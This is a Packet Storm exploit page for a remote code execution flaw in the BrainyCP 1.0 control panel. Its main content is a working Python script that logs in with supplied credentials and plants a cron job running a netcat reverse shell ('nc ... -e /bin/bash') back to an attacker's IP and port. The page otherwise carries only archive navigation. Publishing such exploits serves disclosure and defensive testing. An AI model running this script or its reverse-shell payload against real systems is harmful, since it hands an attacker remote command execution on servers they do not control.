exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BrainyCP 1.0 Remote Code Execution

BrainyCP 1.0 Remote Code Execution
Posted Apr 10, 2023
Authored by Ahmet Umit Bayram

BrainyCP version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | af2047c1e45bc324f8728aa875b9db47da73dd5f122237f31c7764332aee5467

BrainyCP 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A

import requests

# credentials
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")

# login
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
print("[-] Wrong credentials or may the system patched.")
exit()


# reverse shell
reverse_shell = f"nc {ip} {port} -e /bin/bash"

# request
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
"cron_freq_minutes": "*",
"cron_freq_minutes_own": "",
"cron_freq_hours": "*",
"cron_freq_hours_own": "",
"cron_freq_days": "*",
"cron_freq_days_own": "",
"cron_freq_months": "*",
"cron_freq_weekdays": "*",
"cron_command": reverse_shell,
"cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)

print("[+] Check your listener!")



Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    23 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close